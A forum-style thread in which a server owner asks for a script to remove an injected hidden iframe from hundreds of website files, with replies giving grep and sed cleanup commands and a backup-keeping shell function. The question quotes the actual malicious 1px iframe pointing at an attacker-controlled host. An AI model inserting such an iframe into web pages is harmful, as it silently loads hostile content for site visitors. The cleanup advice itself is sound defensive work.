I'm looking for a script to delete the following iframe malware from my linux server:
<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
It has infected hundreds of files on my server on different websites. I tried
grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'
but it just outputs:
sed: -e expression #1, char 49: unknown option to `s'
Appreciate your help :)
Cheers
Dee
Unescape the backslashes from the url in the sed regex.
This should be a more generic solution. Effectively what the malware does is look for the </body> and inject the iframe just before that. So you can look for an iframe which is just before the </body> and replace it with just the </body>.
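# grep recursively for text
# escape all spaces in file names (the backslash must be doubled inside sed)
# global search and replace with just body tag
# [^>]* keeps the match inside one iframe tag instead of running across the line
grep -Rl "</iframe></body>" * | sed 's/ /\\ /g' | xargs sed -i 's/<iframe [^>]*><\/iframe><\/body>/<\/body>/g'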
I found this other question on renaming the malware files, which is also useful to quickly take down all the compromised files by renaming the extensions with a .hacked at the end. Then you can fix the hack and finally remove the .hacked.
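A variant of the cleanup discussed in this thread, as an added example that is not code from any of the posters: it removes only iframes whose src points at the given host, keeps a backup of each changed file, and handles file names containing spaces. The function names, the `.hacked-bak` suffix and the `/var/www` path in the usage comment are assumptions, and GNU grep, sed and xargs are assumed.

```shell
#!/bin/sh
# Added example (not from the thread). Function names and the .hacked-bak
# suffix are hypothetical; GNU grep/sed/xargs are assumed.
# Usage: clean_iframes /var/www ishigo.sytes.net   (/var/www is an assumed path)

clean_iframes() {
    root=$1
    host=$2
    # Escape dots so the host name is matched literally in the regex.
    host_re=$(printf '%s' "$host" | sed 's/\./\\./g')
    # '#' is used as the s-command delimiter, so the slashes in the URL
    # need no escaping (unescaped slashes cause "unknown option to `s'").
    # [^>]* and [^"]* keep the match inside one tag, so other iframes or
    # markup on the same line are not touched.
    expr="s#<iframe [^>]*src=\"http://${host_re}/[^\"]*\"[^>]*></iframe>##g"
    # -Z and -0 pass NUL-terminated names: spaces in file names are safe.
    # -r stops xargs from running sed when nothing matched.
    grep -rlZF --exclude='*.hacked-bak' -- "$host" "$root" |
        xargs -0 -r sed -i.hacked-bak -e "$expr"
}

# Number of files (backups excluded) that still mention the host.
count_infected() {
    grep -rlF --exclude='*.hacked-bak' -- "$2" "$1" | wc -l
}
```

Run `count_infected` before and after the cleanup; once the result is 0 and the sites are verified, move the `.hacked-bak` copies out of the web root.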